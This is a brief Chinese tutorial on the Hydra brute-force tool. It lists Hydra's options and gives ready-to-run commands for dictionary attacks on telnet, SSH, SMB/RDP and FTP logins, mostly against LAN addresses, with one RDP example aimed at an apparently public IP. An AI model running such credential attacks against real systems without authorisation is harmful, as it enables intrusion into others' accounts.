Hydra是一款开源的暴力破解工具,由著名黑客组织THC开发。它支持多种协议和登录方法,如SSH、FTP、HTTP等,广泛用于渗透测试和安全评估。通过暴力破解、字典攻击、多线程等技术,尝试猜测和破解密码,以获取系统认证权限。
1、基础用法
格式
hydra -L XXX.txt -P XXX.txt 目标IP或网址 协议/端口
-V 表示显示攻击过程
-L 设置账号字典
-P 加载密码字典
-l 设置账号
-p 设置密码
-s 更改默认服务端口
telnet用户和密码爆破
telnet用户和密码爆破
root@kali:~/桌面/密码库# hydra -L 常见用户名.txt_OK.txt -P 弱密码top100.txt 192.168.0.55 telnet -V
SSH用户和密码爆破
SSH用户和密码爆破
root@kali:~/桌面/密码库# hydra -l admin -P pwdss.txt 192.168.0.55 SSH -V
RDP用户和密码爆破
RDP用户和密码爆破
root@kali:~# hydra -l administrator -P ps.txt 192.168.2.109 smb -vV
或
hydra -l administrator -P 常见密码.txt 221.231.108.190 rdp -s 12315 -V
FTP用户名和密码爆破
FTP用户名和密码爆破
hydra -l user -P passlist.txt ftp://192.168.0.1